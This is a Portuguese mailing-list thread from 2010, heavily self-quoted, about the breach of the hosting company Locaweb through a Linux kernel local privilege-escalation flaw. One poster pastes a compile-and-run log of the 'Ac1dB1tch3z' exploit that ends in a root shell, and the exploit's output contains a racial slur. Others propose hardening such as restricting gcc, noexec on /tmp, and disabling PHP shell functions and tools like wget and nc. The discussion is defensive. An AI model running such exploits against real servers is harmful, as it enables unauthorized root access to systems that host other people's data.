0v3r thr0w f0ps g0v3rnm3nt >>> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >>> sh-3.2# whoami; id >>> root >>> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >>> >>> >>> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc >>> compilar o exploit em 32bits.. >>> >>> em um lik ja publicado aqui, >>> (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) >>> tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum >>> software que seja 32bits.. o melhor eh desativar definitivamente a >>> compatibilidade !! >>> >>> :) >>> >>> >>> >>> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>>> locaweb foi comprometido, em quest?o de horas os servi?os foram >>>> normalizados >>>> e isso sim ? bom. >>>> >>>> Procure por dom?nios de grandes provedores aqui: >>>> http://www.zone-h.com/archive >>>> >>>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >>>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >>>> apenas de ataques que se tornaram p?blicos...). >>>> >>>> O importante ? que eles busquem aprender com o ocorrido, e com certeza isso >>>> deve acontecer, elevando ainda mais a sua maturidade. >>>> >>>> []s >>>> >>>> Em 18 de setembro de 2010 17:57, Guilherme Boingescreveu: >>>> >>>>> Roberto, >>>>> >>>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, >>>>> ? >>>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>>>> 'defaceados'. >>>>> >>>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es >>>>> e >>>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>>>> de >>>>> kernel. >>>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, >>>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>>> >>>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso >>>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>>> servidores, para depois sim, tomar um passo deste. >>>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>>>> prover o acesso SSH aos clientes ou n?o. >>>>> >>>>> Essa historia se resume em amadorismo. >>>>> >>>>> 2010/9/18 Roberto Bert? >>>>> >>>>>> Ola Guilherme, >>>>>> >>>>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>>>> Pode >>>>>> ter sido outra coisa, mas duvido muito. >>>>>> >>>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>>>> por >>>>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a >>>>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, ou >>>>>> at? >>>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>>>> metodo >>>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>>> podem >>>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>>> >>>>>> Nao ? bug de chroot de ftp. >>>>>> >>>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>>>> num >>>>>> ambiente de testes. >>>>>> >>>>>> >>>>>> >>>>>> 2010/9/18 Guilherme Boing >>>>>> >>>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>>>> que >>>>>>> foi publicado com o acontecido na Locaweb ? >>>>>>> >>>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>>>> quem, >>>>>>> dos usu?rios ? >>>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema >>>>>> for >>>>>>> bem protegido e bem administrado. >>>>>>> >>>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>>> executado >>>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>>>> >>>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>>> privil?gios >>>>>>> do >>>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>>> pelo >>>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>>> atualizado como bem protegido. >>>>>>> >>>>>>> 2010/9/18 Roberto Bert? >>>>>>> >>>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>>> segunda >>>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>>> >>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>>>> < >>>>>>>> >>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>>>>> __ >>>>>> masoch-l list >>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>> >>> >>> -- >>> Sds. >>> >>> Alexandre Jeronimo Correa >>> S?cio-Administrador >>> >>> Onda Internet >>> www.onda.net.br >>> >>> IPV6 Ready ! >>> www.ipv6.onda.net.br >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > > -- > Sds. > > Alexandre Jeronimo Correa > S?cio-Administrador > > Onda Internet > www.onda.net.br > > IPV6 Ready ! > www.ipv6.onda.net.br > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From egbertomonteiro at gmail.com Mon Sep 20 14:10:55 2010 From: egbertomonteiro at gmail.com (Egberto Monteiro) Date: Mon, 20 Sep 2010 14:10:55 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: References: Message-ID: <4C97959F.5070605@gmail.com> O buraco ? mais embaixo, se o cara envia o arquivo j? compilado? Deve-se dificultar/impossibilitar a execu??o de arquivos arbitrarios e para isso existem N possibilidades. Att, Egberto Monteiro Em 09/20/2010 01:20 PM, Alexandre Gorges escreveu: > Chmod 700 /usr/bin/gcc apenas root pode usar. > > > []'s > Alexandre Gorges > http://www.google.com.br/profiles/algorges > MSN/Skype: alexandre at dag.net.br > ICQ: 2031408 > > > > >> From: "Alexandre J. Correa - Onda Internet" >> Organization: Onda Internet Ltda. >> Reply-To: Lista Masoch >> Date: Mon, 20 Sep 2010 12:07:16 -0300 >> To: Lista Masoch >> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre >> ataque cracker >> >> mas se o php for bloqueado (extensoes/funoces de execu??o).. ja >> dificulta.. >> >> manter o /tmp e outras pastas de escrita "publica" com permissoes de >> noexec no "mount" ... >> >> >> Em 20/09/2010 12:03, Marcelo Coelho escreveu: >>> Alexandre, >>> >>> Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: >>> >>> - o invasor pode compilar o exploit remotamente e enviar para o servidor. >>> - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas com >>> scripts perl e php. >>> >>> >>> >>> On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: >>> >>>> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, >>>> n?o ? "justo" (digamos assim). >>>> >>>> A falha da locaweb ? comum em v?rias empresas de hosting: >>>> >>>> - deixar os compiladores acessiveis aos usuarios. >>>> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de >>>> qualquer usuario.. >>>> - permitir a execucao de scripts. >>>> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >>>> >>>> consegui o exploit e fiz testes em varios servidores.. >>>> >>>> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >>>> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >>>> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >>>> $$$ Kallsyms +r >>>> $$$ K3rn3l r3l3as3: >>>> $$$ prepare_creds->ffffffff8024b626 >>>> $$$ override_creds->ffffffff8024b755 >>>> $$$ revert_creds->ffffffff8024bbf4 >>>> $$$ Kernel Credentials detected >>>> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >>>> $$$ timer_list_fops->ffffffff806bbb80 >>>> $$$ w34p0n 0f ch01c3: F0PZzZzzz >>>> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >>>> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >>>> $$$ Us1ng cr3d s3ash3llc0d3z >>>> $$$ 0p3n1ng th3 m4giq p0rt4l >>>> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >>>> $$$ 0v3r thr0w f0ps g0v3rnm3nt >>>> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >>>> sh-3.2# whoami; id >>>> root >>>> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >>>> >>>> >>>> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc >>>> compilar o exploit em 32bits.. >>>> >>>> em um lik ja publicado aqui, >>>> (http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/) >>>> tem um codigo para desligar a compatibilidade 32bits... se nao rodar nenhum >>>> software que seja 32bits.. o melhor eh desativar definitivamente a >>>> compatibilidade !! >>>> >>>> :) >>>> >>>> >>>> >>>> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>>>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>>>> locaweb foi comprometido, em quest?o de horas os servi?os foram >>>>> normalizados >>>>> e isso sim ? bom. >>>>> >>>>> Procure por dom?nios de grandes provedores aqui: >>>>> http://www.zone-h.com/archive >>>>> >>>>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer um >>>>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos falando >>>>> apenas de ataques que se tornaram p?blicos...). >>>>> >>>>> O importante ? que eles busquem aprender com o ocorrido, e com certeza isso >>>>> deve acontecer, elevando ainda mais a sua maturidade. >>>>> >>>>> []s >>>>> >>>>> Em 18 de setembro de 2010 17:57, Guilherme Boingescreveu: >>>>> >>>>>> Roberto, >>>>>> >>>>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que houve, >>>>>> ? >>>>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que foram >>>>>> 'defaceados'. >>>>>> >>>>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha da >>>>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado corre??es >>>>>> e >>>>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a n?vel >>>>>> de >>>>>> kernel. >>>>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio algum, >>>>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>>>> >>>>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, acesso >>>>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>>>> servidores, para depois sim, tomar um passo deste. >>>>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente de >>>>>> prover o acesso SSH aos clientes ou n?o. >>>>>> >>>>>> Essa historia se resume em amadorismo. >>>>>> >>>>>> 2010/9/18 Roberto Bert? >>>>>> >>>>>>> Ola Guilherme, >>>>>>> >>>>>>> Pelos horarios que aconteceram os eventos e as informacoes no twitter. >>>>>> Pode >>>>>>> ter sido outra coisa, mas duvido muito. >>>>>>> >>>>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa no >>>>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na redhat >>>>>> por >>>>>>> nao ter auditado, podemos por a culpa nos pesquisadores que descobriram a >>>>>>> falha, ou nos que divulgaram a falha na internet junto com o exploit, ou >>>>>>> at? >>>>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem um >>>>>>> metodo >>>>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>>>> podem >>>>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>>>> >>>>>>> Nao ? bug de chroot de ftp. >>>>>>> >>>>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem a >>>>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir um >>>>>>> binario compilado e executar ele e voce virava root. Eu reproduzi isso >>>>>> num >>>>>>> ambiente de testes. >>>>>>> >>>>>>> >>>>>>> >>>>>>> 2010/9/18 Guilherme Boing >>>>>>> >>>>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit '0day' >>>>>> que >>>>>>>> foi publicado com o acontecido na Locaweb ? >>>>>>>> >>>>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? de >>>>>>>> quem, >>>>>>>> dos usu?rios ? >>>>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o sistema >>>>>>> for >>>>>>>> bem protegido e bem administrado. >>>>>>>> >>>>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>>>> executado >>>>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio web. >>>>>>>> >>>>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>>>> privil?gios >>>>>>>> do >>>>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>>>> pelo >>>>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>>>> atualizado como bem protegido. >>>>>>>> >>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>> >>>>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>>>> segunda >>>>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>>>> >>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>>>>> < >>>>>>>>> >>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/> >>>>>>> __ >>>>>>> masoch-l list >>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>> >>>>>> __ >>>>>> masoch-l list >>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>> >>>> -- >>>> Sds. >>>> >>>> Alexandre Jeronimo Correa >>>> S?cio-Administrador >>>> >>>> Onda Internet >>>> www.onda.net.br >>>> >>>> IPV6 Ready ! >>>> www.ipv6.onda.net.br >>>> >>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> -- >> Sds. >> >> Alexandre Jeronimo Correa >> S?cio-Administrador >> >> Onda Internet >> www.onda.net.br >> >> IPV6 Ready ! >> www.ipv6.onda.net.br >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l From kolt at frag.com.br Mon Sep 20 14:12:48 2010 From: kolt at frag.com.br (Guilherme Boing) Date: Mon, 20 Sep 2010 14:12:48 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C97959F.5070605@gmail.com> References: <4C97959F.5070605@gmail.com> Message-ID: Assim como existem N meios de enviar o arquivo para o servidor, executar, etc, etc - existem N? meios de bloque?-los. 2010/9/20 Egberto Monteiro > O buraco ? mais embaixo, se o cara envia o arquivo j? compilado? > > Deve-se dificultar/impossibilitar a execu??o de arquivos arbitrarios e para > isso existem N possibilidades. > > Att, > Egberto Monteiro > > Em 09/20/2010 01:20 PM, Alexandre Gorges escreveu: > > Chmod 700 /usr/bin/gcc apenas root pode usar. >> >> >> []'s >> Alexandre Gorges >> http://www.google.com.br/profiles/algorges >> MSN/Skype: alexandre at dag.net.br >> ICQ: 2031408 >> >> >> >> >> From: "Alexandre J. Correa - Onda Internet" >>> Organization: Onda Internet Ltda. >>> Reply-To: Lista Masoch >>> Date: Mon, 20 Sep 2010 12:07:16 -0300 >>> To: Lista Masoch >>> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb >>> sofre >>> ataque cracker >>> >>> mas se o php for bloqueado (extensoes/funoces de execu??o).. ja >>> dificulta.. >>> >>> manter o /tmp e outras pastas de escrita "publica" com permissoes de >>> noexec no "mount" ... >>> >>> >>> Em 20/09/2010 12:03, Marcelo Coelho escreveu: >>> >>>> Alexandre, >>>> >>>> Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o >>>> problema: >>>> >>>> - o invasor pode compilar o exploit remotamente e enviar para o >>>> servidor. >>>> - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas >>>> com >>>> scripts perl e php. >>>> >>>> >>>> >>>> On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: >>>> >>>> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido >>>>> feito, >>>>> n?o ? "justo" (digamos assim). >>>>> >>>>> A falha da locaweb ? comum em v?rias empresas de hosting: >>>>> >>>>> - deixar os compiladores acessiveis aos usuarios. >>>>> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de >>>>> qualquer usuario.. >>>>> - permitir a execucao de scripts. >>>>> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >>>>> >>>>> consegui o exploit e fiz testes em varios servidores.. >>>>> >>>>> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >>>>> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >>>>> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >>>>> $$$ Kallsyms +r >>>>> $$$ K3rn3l r3l3as3: >>>>> $$$ prepare_creds->ffffffff8024b626 >>>>> $$$ override_creds->ffffffff8024b755 >>>>> $$$ revert_creds->ffffffff8024bbf4 >>>>> $$$ Kernel Credentials detected >>>>> ??? Trying the F0PPPPPPPPPPPPPPPPpppppppppp_____ m3th34d >>>>> $$$ timer_list_fops->ffffffff806bbb80 >>>>> $$$ w34p0n 0f ch01c3: F0PZzZzzz >>>>> $$$ Bu1ld1ng r1ngzer0c00l sh3llc0d3 - F0PZzzZzZZ/LSD(M) m3th34d >>>>> $$$ Prepare: m0rn1ng w0rk0ut b1tch3z >>>>> $$$ Us1ng cr3d s3ash3llc0d3z >>>>> $$$ 0p3n1ng th3 m4giq p0rt4l >>>>> $$$ m4q1c p0rt4l l3n f0und: 0x7fa4543c >>>>> $$$ 0v3r thr0w f0ps g0v3rnm3nt >>>>> $$$ bl1ng bl1ng n1gg4 :PppPpPPpPPPpP >>>>> sh-3.2# whoami; id >>>>> root >>>>> uid=0(root) gid=500(alexandre) groups=10(wheel),500(alexandre) >>>>> >>>>> >>>>> a fallha ? no sistema de compatibilidade 32bits, veja que forcei o gcc >>>>> compilar o exploit em 32bits.. >>>>> >>>>> em um lik ja publicado aqui, >>>>> ( >>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>> ) >>>>> tem um codigo para desligar a compatibilidade 32bits... se nao rodar >>>>> nenhum >>>>> software que seja 32bits.. o melhor eh desativar definitivamente a >>>>> compatibilidade !! >>>>> >>>>> :) >>>>> >>>>> >>>>> >>>>> Em 19/09/2010 15:09, Marcelo M. Fleury escreveu: >>>>> >>>>>> ? muita prepot?ncia dizer que a locaweb ? amadora. Um dos servi?os da >>>>>> locaweb foi comprometido, em quest?o de horas os servi?os foram >>>>>> normalizados >>>>>> e isso sim ? bom. >>>>>> >>>>>> Procure por dom?nios de grandes provedores aqui: >>>>>> http://www.zone-h.com/archive >>>>>> >>>>>> terra, uol... todos j? foram vitimas. O que a locaweb passou, qualquer >>>>>> um >>>>>> pode passar, tal como j? aconteceu com nasa, m$ e etc(e estamos >>>>>> falando >>>>>> apenas de ataques que se tornaram p?blicos...). >>>>>> >>>>>> O importante ? que eles busquem aprender com o ocorrido, e com certeza >>>>>> isso >>>>>> deve acontecer, elevando ainda mais a sua maturidade. >>>>>> >>>>>> []s >>>>>> >>>>>> Em 18 de setembro de 2010 17:57, Guilherme Boing>>>>> >escreveu: >>>>>> >>>>>> Roberto, >>>>>>> >>>>>>> Sim, a discuss?o pode ser gigante, mas a culpa, independente do que >>>>>>> houve, >>>>>>> ? >>>>>>> da Locaweb, que ? a respons?vel pela hospedagem desses sites que >>>>>>> foram >>>>>>> 'defaceados'. >>>>>>> >>>>>>> N?o podemos por a culpa na RedHat, pois alem de ter sido uma escolha >>>>>>> da >>>>>>> pr?pria Locaweb, utilizando o kernel deles, poderia ter aplicado >>>>>>> corre??es >>>>>>> e >>>>>>> m?todos de seguran?a que inibiriam qualquer tipo de exploit local a >>>>>>> n?vel >>>>>>> de >>>>>>> kernel. >>>>>>> Voc? n?o precisa dar permiss?o para o cliente rodar arquivo bin?rio >>>>>>> algum, >>>>>>> se tratando de plataforma web. Muito menos, garantir acesso SSH. >>>>>>> >>>>>>> Se a Locaweb deseja garantir, por comodidade e como um diferencial, >>>>>>> acesso >>>>>>> SSH aos clientes, deveria prezar primeiramente pela seguran?a dos >>>>>>> servidores, para depois sim, tomar um passo deste. >>>>>>> De qualquer forma, ? poss?vel manter seu sistema seguro, independente >>>>>>> de >>>>>>> prover o acesso SSH aos clientes ou n?o. >>>>>>> >>>>>>> Essa historia se resume em amadorismo. >>>>>>> >>>>>>> 2010/9/18 Roberto Bert? >>>>>>> >>>>>>> Ola Guilherme, >>>>>>>> >>>>>>>> Pelos horarios que aconteceram os eventos e as informacoes no >>>>>>>> twitter. >>>>>>>> >>>>>>> Pode >>>>>>> >>>>>>>> ter sido outra coisa, mas duvido muito. >>>>>>>> >>>>>>>> Olha, a discussao de quem ? a culpa ? gigante. Podemos por a culpa >>>>>>>> no >>>>>>>> pessoal que escreveu o codigo do kernel, podemos por a culpa na >>>>>>>> redhat >>>>>>>> >>>>>>> por >>>>>>> >>>>>>>> nao ter auditado, podemos por a culpa nos pesquisadores que >>>>>>>> descobriram a >>>>>>>> falha, ou nos que divulgaram a falha na internet junto com o >>>>>>>> exploit, ou >>>>>>>> at? >>>>>>>> mesmo nos legisladores do mundo todo por nao termos leis que criem >>>>>>>> um >>>>>>>> metodo >>>>>>>> seguro de divulgar falhas de seguranca primeiro para as empresas que >>>>>>>> >>>>>>> podem >>>>>>> >>>>>>>> corrigir e depois abertamente. Enfim... ? enorme mesmo a discussao. >>>>>>>> >>>>>>>> Nao ? bug de chroot de ftp. >>>>>>>> >>>>>>>> Em ambiente de hospedagem voce da acesso aos clientes a SSH e tambem >>>>>>>> a >>>>>>>> execucao de comados, porque tem php, perl, etc. Entao bastava subir >>>>>>>> um >>>>>>>> binario compilado e executar ele e voce virava root. Eu reproduzi >>>>>>>> isso >>>>>>>> >>>>>>> num >>>>>>> >>>>>>>> ambiente de testes. >>>>>>>> >>>>>>>> >>>>>>>> >>>>>>>> 2010/9/18 Guilherme Boing >>>>>>>> >>>>>>>> Desculpe, mas, baseado em quais fatos voc? relaciona o exploit >>>>>>>>> '0day' >>>>>>>>> >>>>>>>> que >>>>>>> >>>>>>>> foi publicado com o acontecido na Locaweb ? >>>>>>>>> >>>>>>>>> E tamb?m, como voc? me diz que a Locaweb n?o teve culpa ? A culpa ? >>>>>>>>> de >>>>>>>>> quem, >>>>>>>>> dos usu?rios ? >>>>>>>>> Uma falha no kernel n?o garante acesso privilegiado algum, se o >>>>>>>>> sistema >>>>>>>>> >>>>>>>> for >>>>>>>> >>>>>>>>> bem protegido e bem administrado. >>>>>>>>> >>>>>>>>> Pra come?o de conversa, nem deveria ser poss?vel tal exploit ser >>>>>>>>> >>>>>>>> executado >>>>>>>> >>>>>>>>> em um ambiente de webhosting, ainda mais, em cima de um usu?rio >>>>>>>>> web. >>>>>>>>> >>>>>>>>> Sendo um bug de chroot de ftp, um exploit local que elevou os >>>>>>>>> >>>>>>>> privil?gios >>>>>>> >>>>>>>> do >>>>>>>>> invasor, ou qualquer outra coisa, a Locaweb ? respons?vel e culpada >>>>>>>>> >>>>>>>> pelo >>>>>>> >>>>>>>> ocorrido, pois era de sua responsabilidade, manter o sistema tanto >>>>>>>>> atualizado como bem protegido. >>>>>>>>> >>>>>>>>> 2010/9/18 Roberto Bert? >>>>>>>>> >>>>>>>>> Viu pessoal, aproveito para divulgar o workaround e a falha, na >>>>>>>>>> >>>>>>>>> segunda >>>>>>> >>>>>>>> parte do artigo tem info de como proteger. Foi bem grave mesmo >>>>>>>>>> >>>>>>>>>> >>>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>>> >>>>>>>> < >>>>>>>>>> >>>>>>>>>> >>>>>>> http://blog.tehospedo.com.br/novidades/2010-09-17/locaweb-nao-teve-culpa/ >>>>>>> > >>>>>>> >>>>>>>> __ >>>>>>>> masoch-l list >>>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>>> >>>>>>>> __ >>>>>>> masoch-l list >>>>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>>>> >>>>>>> -- >>>>> Sds. >>>>> >>>>> Alexandre Jeronimo Correa >>>>> S?cio-Administrador >>>>> >>>>> Onda Internet >>>>> www.onda.net.br >>>>> >>>>> IPV6 Ready ! >>>>> www.ipv6.onda.net.br >>>>> >>>>> __ >>>>> masoch-l list >>>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>>> >>>>> __ >>>> masoch-l list >>>> https://eng.registro.br/mailman/listinfo/masoch-l >>>> >>>> >>> -- >>> Sds. >>> >>> Alexandre Jeronimo Correa >>> S?cio-Administrador >>> >>> Onda Internet >>> www.onda.net.br >>> >>> IPV6 Ready ! >>> www.ipv6.onda.net.br >>> >>> __ >>> masoch-l list >>> https://eng.registro.br/mailman/listinfo/masoch-l >>> >> >> __ >> masoch-l list >> https://eng.registro.br/mailman/listinfo/masoch-l >> > > __ > masoch-l list > https://eng.registro.br/mailman/listinfo/masoch-l > From algorges at gmail.com Mon Sep 20 14:17:32 2010 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 20 Sep 2010 14:17:32 -0300 Subject: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre ataque cracker In-Reply-To: <4C97959F.5070605@gmail.com> Message-ID: No php eu desligo algumas coisas disable_functions escapeshellarg,?escapeshellcmd,?exec,?passthru,?proc_close,?proc_open,?shell _exec,?system,?dl,?popen,?php_check_syntax,?php_strip_whitespace,?symlink,?l ink,?openlog,?apache_child_terminate,?apache_get_modules,?apache_get_version ,?apache_getenv,?apache_note,?apache_sentenv,?virtual E limito o opendir para o home onde fica o site: open_basedir /home/sites/xxxx.com.br:/usr/share/pear doc_root /home/sites/xxxx.com.br Alguma outra sugestao para o php? []'s Alexandre Gorges http://www.google.com.br/profiles/algorges MSN/Skype: alexandre at dag.net.br ICQ: 2031408 > From: Egberto Monteiro > Reply-To: Lista Masoch > Date: Mon, 20 Sep 2010 14:10:55 -0300 > To: Lista Masoch > Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre > ataque cracker > > O buraco ? mais embaixo, se o cara envia o arquivo j? compilado? > > Deve-se dificultar/impossibilitar a execu??o de arquivos arbitrarios e > para isso existem N possibilidades. > > Att, > Egberto Monteiro > > Em 09/20/2010 01:20 PM, Alexandre Gorges escreveu: >> Chmod 700 /usr/bin/gcc apenas root pode usar. >> >> >> []'s >> Alexandre Gorges >> http://www.google.com.br/profiles/algorges >> MSN/Skype: alexandre at dag.net.br >> ICQ: 2031408 >> >> >> >> >>> From: "Alexandre J. Correa - Onda Internet" >>> Organization: Onda Internet Ltda. >>> Reply-To: Lista Masoch >>> Date: Mon, 20 Sep 2010 12:07:16 -0300 >>> To: Lista Masoch >>> Subject: Re: [MASOCH-L] RES: Locaweb - Problemas com E-mails - Locaweb sofre >>> ataque cracker >>> >>> mas se o php for bloqueado (extensoes/funoces de execu??o).. ja >>> dificulta.. >>> >>> manter o /tmp e outras pastas de escrita "publica" com permissoes de >>> noexec no "mount" ... >>> >>> >>> Em 20/09/2010 12:03, Marcelo Coelho escreveu: >>>> Alexandre, >>>> >>>> Estas medidas apenas criam alguma dificuldade, mas n?o resolvem o problema: >>>> >>>> - o invasor pode compilar o exploit remotamente e enviar para o servidor. >>>> - limita??es de acesso ao wget, nc, shell_exec etc podem ser contornadas >>>> com >>>> scripts perl e php. >>>> >>>> >>>> >>>> On Sep 19, 2010, at 4:16 PM, Alexandre J. Correa - Onda Internet wrote: >>>> >>>>> Em algum ponto a LocaWeb falhou sim, mas sacrafica-la como tem sido feito, >>>>> n?o ? "justo" (digamos assim). >>>>> >>>>> A falha da locaweb ? comum em v?rias empresas de hosting: >>>>> >>>>> - deixar os compiladores acessiveis aos usuarios. >>>>> - alguns binarios como wget, nc, etc ficam disponiveis para execucao de >>>>> qualquer usuario.. >>>>> - permitir a execucao de scripts. >>>>> - deixar algumas funcoes do php ativas (dl_open, shell_exec, etc) >>>>> >>>>> consegui o exploit e fiz testes em varios servidores.. >>>>> >>>>> [alexandre at xxx aaa]$ gcc Ac1dB1tch3z.c -m32 -o Ac1dB1tch3z >>>>> [alexandre at xxx aaa]$ ./Ac1dB1tch3z >>>>> Ac1dB1tCh3z VS Linux kernel 2.6 kernel 0d4y >>>>> $$$ Kallsyms +r >>>>> $$$ K3rn3l r3l3as3: >>>>> $$$ 